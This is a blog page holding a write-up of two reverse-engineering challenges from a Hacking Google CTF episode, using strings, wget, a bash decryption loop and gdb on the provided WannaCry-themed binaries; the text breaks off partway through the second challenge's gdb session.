
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="My writeup for EP001 of the Hacking Google CTF : Threat Analysis Group.">
      
      
      
        <link rel="canonical" href="https://www.techbrunch.fr/blog/hacking-google-ep001---threat-analysis-group/">
      
      
        <link rel="prev" href="../hacking-google-ep000---operation-aurora/">
      
      
        <link rel="next" href="../hacking-google-ep002---detection--response/">
      
      
        <link rel="alternate" type="application/rss+xml" title="RSS feed" href="../../feed_rss_created.xml">
        <link rel="alternate" type="application/rss+xml" title="RSS feed of updated content" href="../../feed_rss_updated.xml">
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.37">
    
    
      
        <title>Hacking Google EP001 - Threat Analysis Group - Today I Learned</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.8c3ca2c6.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        
        <link rel="stylesheet" href="../../assets/external/fonts.googleapis.com/css.49ea35f2.css">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
      
        <meta  property="og:type"  content="website" >
      
        <meta  property="og:title"  content="Hacking Google EP001 - Threat Analysis Group - Today I Learned" >
      
        <meta  property="og:description"  content="My writeup for EP001 of the Hacking Google CTF : Threat Analysis Group." >
      
        <meta  property="og:image"  content="https://www.techbrunch.fr/assets/images/social/blog/posts/hacking-google-threat-analysis-group.png" >
      
        <meta  property="og:image:type"  content="image/png" >
      
        <meta  property="og:image:width"  content="1200" >
      
        <meta  property="og:image:height"  content="630" >
      
        <meta  property="og:url"  content="https://www.techbrunch.fr/blog/hacking-google-ep001---threat-analysis-group/" >
      
        <meta  name="twitter:card"  content="summary_large_image" >
      
        <meta  name="twitter:title"  content="Hacking Google EP001 - Threat Analysis Group - Today I Learned" >
      
        <meta  name="twitter:description"  content="My writeup for EP001 of the Hacking Google CTF : Threat Analysis Group." >
      
        <meta  name="twitter:image"  content="https://www.techbrunch.fr/assets/images/social/blog/posts/hacking-google-threat-analysis-group.png" >
      
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#hacking-google-ep001-threat-analysis-group" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
        <aside class="md-banner">
          <div class="md-banner__inner md-grid md-typeset">
            
              <button class="md-banner__button md-icon" aria-label="Don't show this again">
                
                <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
              </button>
            
            
  <a href="https://twitter.com/techbrunchfr">
    For updates follow <strong>@techbrunchfr</strong> on
    <span class="twemoji twitter">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 512 512"><!--! Font Awesome Free 6.6.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253"/></svg>
    </span>
    <strong>Twitter</strong>
  </a>

          </div>
          
            <script>var el=document.querySelector("[data-md-component=announce]");if(el){var content=el.querySelector(".md-typeset");__md_hash(content.innerHTML)===__md_get("__announce")&&(el.hidden=!0)}</script>
          
        </aside>
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../.." title="Today I Learned" class="md-header__button md-logo" aria-label="Today I Learned" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Today I Learned
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Hacking Google EP001 - Threat Analysis Group
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to dark mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo"  aria-label="Switch to light mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      <label class="md-header__button md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
      </label>
      <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
    
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
                
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" hidden>
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    



<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../.." title="Today I Learned" class="md-nav__button md-logo" aria-label="Today I Learned" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    Today I Learned
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
    
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1" checked>
        
          
          <label class="md-nav__link" for="__nav_1" id="__nav_1_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Blog
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_1_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_1">
            <span class="md-nav__icon md-icon"></span>
            Blog
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
    
  
  
    
  
  
    <li class="md-nav__item md-nav__item--active">
      <a href="../" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    Blog
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1_2" >
        
          
          <label class="md-nav__link" for="__nav_1_2" id="__nav_1_2_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Archive
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_1_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1_2">
            <span class="md-nav__icon md-icon"></span>
            Archive
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    
  
  
    <li class="md-nav__item">
      <a href="../archive/2022/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    2022
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
    
  
  
    <li class="md-nav__item">
      <a href="../archive/2020/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    2020
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1_3" >
        
          
          <label class="md-nav__link" for="__nav_1_3" id="__nav_1_3_label" tabindex="0">
            
  
  <span class="md-ellipsis">
    Categories
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_1_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1_3">
            <span class="md-nav__icon md-icon"></span>
            Categories
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
    
  
  
    <li class="md-nav__item">
      <a href="../category/writeup/" class="md-nav__link">
        
  
  <span class="md-ellipsis">
    WriteUp
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
                
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#challenge-01-wannacry" class="md-nav__link">
    <span class="md-ellipsis">
      Challenge 01 - Wannacry
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#challenge-02-wannacry-killswitch" class="md-nav__link">
    <span class="md-ellipsis">
      Challenge 02 - Wannacry Killswitch
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#challenge-03-hacker-chess-2" class="md-nav__link">
    <span class="md-ellipsis">
      Challenge 03 - Hacker Chess 2
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
  <div class="md-content md-content--post" data-md-component="content">
    <div class="md-sidebar md-sidebar--post" data-md-component="sidebar" data-md-type="navigation">
      <div class="md-sidebar__scrollwrap">
        <div class="md-sidebar__inner md-post">
          <nav class="md-nav md-nav--primary">
            <div class="md-post__back">
              <div class="md-nav__title md-nav__container">
                <a href="../" class="md-nav__link">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
                  <span class="md-ellipsis">
                    Back to index
                  </span>
                </a>
              </div>
            </div>
            
              <div class="md-post__authors md-typeset">
                
                  <div class="md-profile md-post__profile">
                    <span class="md-author md-author--long">
                      <img src="../../assets/external/github.com/Techbrunch.png.jpg" alt="Aloïs Thévenot">
                    </span>
                    <span class="md-profile__description">
                      <strong>
                        
                          Aloïs Thévenot
                        
                      </strong>
                      <br>
                      Pentester
                    </span>
                  </div>
                
              </div>
            
            <ul class="md-post__meta md-nav__list">
              <li class="md-nav__item md-nav__item--section">
                <div class="md-post__title">
                  <span class="md-ellipsis">
                    Metadata
                  </span>
                </div>
                <nav class="md-nav">
                  <ul class="md-nav__list">
                    <li class="md-nav__item">
                      <div class="md-nav__link">
                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 19H5V8h14m-3-7v2H8V1H6v2H5c-1.11 0-2 .89-2 2v14a2 2 0 0 0 2 2h14a2 2 0 0 0 2-2V5a2 2 0 0 0-2-2h-1V1m-1 11h-5v5h5z"/></svg>
                        <time datetime="2022-10-18 00:00:00" class="md-ellipsis">October 18, 2022</time>
                      </div>
                    </li>
                    
                    
                      <li class="md-nav__item">
                        <div class="md-nav__link">
                          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9 3v15h3V3zm3 2 4 13 3-1-4-13zM5 5v13h3V5zM3 19v2h18v-2z"/></svg>
                          <span class="md-ellipsis">
                            in
                            
                              <a href="../category/writeup/">WriteUp</a></span>
                        </div>
                      </li>
                    
                    
                      
                      <li class="md-nav__item">
                        <div class="md-nav__link">
                          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 20a8 8 0 0 0 8-8 8 8 0 0 0-8-8 8 8 0 0 0-8 8 8 8 0 0 0 8 8m0-18a10 10 0 0 1 10 10 10 10 0 0 1-10 10C6.47 22 2 17.5 2 12A10 10 0 0 1 12 2m.5 5v5.25l4.5 2.67-.75 1.23L11 13V7z"/></svg>
                          <span class="md-ellipsis">
                            
                              7 min read
                            
                          </span>
                        </div>
                      </li>
                    
                  </ul>
                </nav>
              </li>
            </ul>
          </nav>
          
        </div>
      </div>
    </div>
    <article class="md-content__inner md-typeset">
      
        
  
  

<nav class="md-tags" >
  
    
    
    
      <span class="md-tag">CTF</span>
    
  
    
    
    
      <span class="md-tag">Web</span>
    
  
    
    
    
      <span class="md-tag">Reversing</span>
    
  
</nav>



<h1 id="hacking-google-ep001-threat-analysis-group">Hacking Google EP001 - Threat Analysis Group<a class="headerlink" href="#hacking-google-ep001-threat-analysis-group" title="Permanent link">&para;</a></h1>
<p>My writeup for EP001 of the Hacking Google CTF : Threat Analysis Group.</p>
<!-- more -->

<h2 id="challenge-01-wannacry">Challenge 01 - Wannacry<a class="headerlink" href="#challenge-01-wannacry" title="Permanent link">&para;</a></h2>
<blockquote>
<p>Your files have been compromised, get them back.</p>
<p>Hint: Find a way to make sense of it.</p>
</blockquote>
<p>We are provided with a zip archive containing two files:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a>❯ tree
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a>.
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a>├── flag
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a>└── wannacry
<a id="__codelineno-0-5" name="__codelineno-0-5" href="#__codelineno-0-5"></a>
<a id="__codelineno-0-6" name="__codelineno-0-6" href="#__codelineno-0-6"></a>0 directories, 2 files
</code></pre></div>
<p>The flag appears to be encrypted and the binary is a Go program:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a>❯ file flag
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a>flag: OpenPGP Secret Key
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a>❯ file wannacry
<a id="__codelineno-1-4" name="__codelineno-1-4" href="#__codelineno-1-4"></a>wannacry: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=IGPSbKhPf45BQqlR84-9/XWC3eVS4fozNp9uK4nDp/_Styn3U-Z8S6ExnY6QOR/RTzNS5QnFmUHeSBeyHIu, with debug_info, not stripped
</code></pre></div>
<div class="admonition info">
<p class="admonition-title">Info</p>
<div class="highlight"><pre><span></span><code>The WannaCry ransomware attack was a worldwide cyberattack in May 2017 by the WannaCry ransomware cryptoworm, which targeted computers running the Microsoft Windows operating system by encrypting data and demanding ransom payments in the Bitcoin cryptocurrency. It propagated through EternalBlue, an exploit developed by the United States National Security Agency (NSA) for Windows systems.
</code></pre></div>
</div>
<p>Let's run the program using Docker<sup id="fnref:docker-for-pentester"><a class="footnote-ref" href="#fn:docker-for-pentester">1</a></sup>:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-2-1" name="__codelineno-2-1" href="#__codelineno-2-1"></a>❯ cd challenge
<a id="__codelineno-2-2" name="__codelineno-2-2" href="#__codelineno-2-2"></a>❯ dockershellhereamd ubuntu
<a id="__codelineno-2-3" name="__codelineno-2-3" href="#__codelineno-2-3"></a>root@b1d72e84c9d2:/challenge# ./wannacry
<a id="__codelineno-2-4" name="__codelineno-2-4" href="#__codelineno-2-4"></a>Usage of ./wannacry:
<a id="__codelineno-2-5" name="__codelineno-2-5" href="#__codelineno-2-5"></a>  -encrypted_file string
<a id="__codelineno-2-6" name="__codelineno-2-6" href="#__codelineno-2-6"></a>        File name to decrypt.
<a id="__codelineno-2-7" name="__codelineno-2-7" href="#__codelineno-2-7"></a>  -key_file string
<a id="__codelineno-2-8" name="__codelineno-2-8" href="#__codelineno-2-8"></a>        File name of the private key.
</code></pre></div>
<p>Using strings I managed to find an interesting domain:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-3-1" name="__codelineno-3-1" href="#__codelineno-3-1"></a>❯ strings wannacry|grep http
<a id="__codelineno-3-2" name="__codelineno-3-2" href="#__codelineno-3-2"></a>m=] = ] n=allgallpasn1avx2basebmi1bmi2boolcallcas1cas2cas3cas4cas5cas6chandeadermsfailfileftpsfunchourhttpicmpidleigmpint8itabkindlinkopenpop3readroots + sbrksmtpsse3stattrueuint  -%s ...
<a id="__codelineno-3-3" name="__codelineno-3-3" href="#__codelineno-3-3"></a> MB,  and  cnt= got  got= max= ms,  ptr  tab= top=, fp:1562578125&lt;nil&gt;AdlamAprilBamumBatakBuhidDograErrorGreekKhmerLatinLimbuLocalMarchNushuOghamOriyaOsageP-224P-256P-384P-521RunicSHA-1STermTakriTamilTypeA] = (arrayclosedeferfalsefaultfilesfloatgcinggscanhchanhttpsimap2imap3imapsinit int16int32int64mheapmonthpanicpop3sscav schedsleepslicesse41sse42ssse3sudogsweeptracetrap:uint8valuewrite B -&gt;  Value addr= alloc base  code= ctxt: curg= free  goid  jobs= list= m-&gt;p= max=  min=  next= p-&gt;m= prev= span=% util(...)
<a id="__codelineno-3-4" name="__codelineno-3-4" href="#__codelineno-3-4"></a>https://wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/
</code></pre></div>
<p>The <a href="https://wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/">website</a> contains a list of pem files:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-4-1" name="__codelineno-4-1" href="#__codelineno-4-1"></a><span class="p">&lt;</span><span class="nt">pre</span><span class="p">&gt;</span>
<a id="__codelineno-4-2" name="__codelineno-4-2" href="#__codelineno-4-2"></a><span class="p">&lt;</span><span class="nt">a</span> <span class="na">href</span><span class="o">=</span><span class="s">&quot;01087458-4d66-4677-af0d-da2024cc2111.pem&quot;</span><span class="p">&gt;</span>01087458-4d66-4677-af0d-da2024cc2111.pem<span class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;</span>
<a id="__codelineno-4-3" name="__codelineno-4-3" href="#__codelineno-4-3"></a><span class="p">&lt;</span><span class="nt">a</span> <span class="na">href</span><span class="o">=</span><span class="s">&quot;02bdbf0d-48c6-4fb5-b5d2-71be3f4f071f.pem&quot;</span><span class="p">&gt;</span>02bdbf0d-48c6-4fb5-b5d2-71be3f4f071f.pem<span class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;</span>
<a id="__codelineno-4-4" name="__codelineno-4-4" href="#__codelineno-4-4"></a><span class="p">&lt;</span><span class="nt">a</span> <span class="na">href</span><span class="o">=</span><span class="s">&quot;034fac8e-d00d-4386-b5fa-69aa9970adb5.pem&quot;</span><span class="p">&gt;</span>034fac8e-d00d-4386-b5fa-69aa9970adb5.pem<span class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;</span>
<a id="__codelineno-4-5" name="__codelineno-4-5" href="#__codelineno-4-5"></a><span class="p">&lt;</span><span class="nt">a</span> <span class="na">href</span><span class="o">=</span><span class="s">&quot;03eaf52e-f0f0-4f2b-8a2d-ab4b53c342fd.pem&quot;</span><span class="p">&gt;</span>03eaf52e-f0f0-4f2b-8a2d-ab4b53c342fd.pem<span class="p">&lt;/</span><span class="nt">a</span><span class="p">&gt;</span>
<a id="__codelineno-4-6" name="__codelineno-4-6" href="#__codelineno-4-6"></a>...
</code></pre></div>
<div class="admonition info">
<p class="admonition-title">Info</p>
<div class="highlight"><pre><span></span><code>.pem - Defined in RFC 1422 (part of a series from 1421 through 1424) this is a container format that may include just the public certificate (such as with Apache installs, and CA certificate files /etc/ssl/certs), or may include an entire certificate chain including public key, **private** key, and root certificates.
</code></pre></div>
</div>
<p>Wannacry being a ransomware we can guess that one of the key was used to encrypt our flag. </p>
<p>Let's try them all, we will first download them and then write a small bash script to try to decrypt the flag with each key.</p>
<p>I used wget to download all the keys:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-5-1" name="__codelineno-5-1" href="#__codelineno-5-1"></a>wget -r -p -k https://wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/
</code></pre></div>
<p>A few lines of bash were enough to run the <code>wannacry</code> binary with each key, I stored the output in a text file.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-6-1" name="__codelineno-6-1" href="#__codelineno-6-1"></a><span class="k">for</span><span class="w"> </span>file<span class="w"> </span><span class="k">in</span><span class="w"> </span>keys/wannacry-keys-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com/*.pem
<a id="__codelineno-6-2" name="__codelineno-6-2" href="#__codelineno-6-2"></a><span class="k">do</span>
<a id="__codelineno-6-3" name="__codelineno-6-3" href="#__codelineno-6-3"></a><span class="w">  </span>./wannacry<span class="w"> </span>-encrypted_file<span class="w"> </span>flag<span class="w"> </span>-key_file<span class="w"> </span><span class="s2">&quot;</span><span class="nv">$file</span><span class="s2">&quot;</span><span class="w"> </span>&gt;&gt;<span class="w"> </span>results.out
<a id="__codelineno-6-4" name="__codelineno-6-4" href="#__codelineno-6-4"></a><span class="k">done</span>
</code></pre></div>
<p>Grepping for <code>http</code> reveals the flag in the output:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-7-1" name="__codelineno-7-1" href="#__codelineno-7-1"></a>cat results.out |grep -ai http
<a id="__codelineno-7-2" name="__codelineno-7-2" href="#__codelineno-7-2"></a>btNL9X
<a id="__codelineno-7-3" name="__codelineno-7-3" href="#__codelineno-7-3"></a>      ]aa5BܞCUWԁ*,bT@x7@ fe.]S9ZSy.+a[01;31mhttps://h4ck1ng.google/solve/CrY_n0_m0r3
</code></pre></div>
<h2 id="challenge-02-wannacry-killswitch">Challenge 02 - Wannacry Killswitch<a class="headerlink" href="#challenge-02-wannacry-killswitch" title="Permanent link">&para;</a></h2>
<blockquote>
<p>Can you find a way to stop the hackers that encrypted your data?</p>
<p>Hint: Find a way to switch it off.</p>
</blockquote>
<p>This time the only thing we got is a binary that does not output anything when ran.</p>
<p>Let's look for interesting strings:</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-8-1" name="__codelineno-8-1" href="#__codelineno-8-1"></a>❯ strings wannacry|grep http
<a id="__codelineno-8-2" name="__codelineno-8-2" href="#__codelineno-8-2"></a>https://wannacry-killswitch-dot-gweb-h4ck1ng-g00gl3.uc.r.appspot.com//
</code></pre></div>
<p>Visiting the website returns the following error:</p>
<blockquote>
<p>Our princess is in another castle.</p>
</blockquote>
<p>Before using the big tools we can get an idea about what is this program doing using <a href="https://dogbolt.org/?id=afbab3cc-2f3c-4e9f-a70d-f9db3760b4e8">dogbolt.org</a>.</p>
<div class="admonition info">
<p class="admonition-title">Info</p>
<div class="highlight"><pre><span></span><code>dogbolt is a decompiler Explorer. It is an interactive online decompiler which shows equivalent C-like output of decompiled programs from many popular decompilers.
</code></pre></div>
</div>
<p>We can see that the main function doesn't do much and that the intersting functions are <code>print</code>, <code>correct_code</code> and <code>totp</code>.</p>
<p>Let's fire gdb to call the print function manually. We'll first need to find it's address since the name of the function conflicts with the print command.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-9-1" name="__codelineno-9-1" href="#__codelineno-9-1"></a>(gdb) info functions
<a id="__codelineno-9-2" name="__codelineno-9-2" href="#__codelineno-9-2"></a>...
<a id="__codelineno-9-3" name="__codelineno-9-3" href="#__codelineno-9-3"></a>Non-debugging symbols:
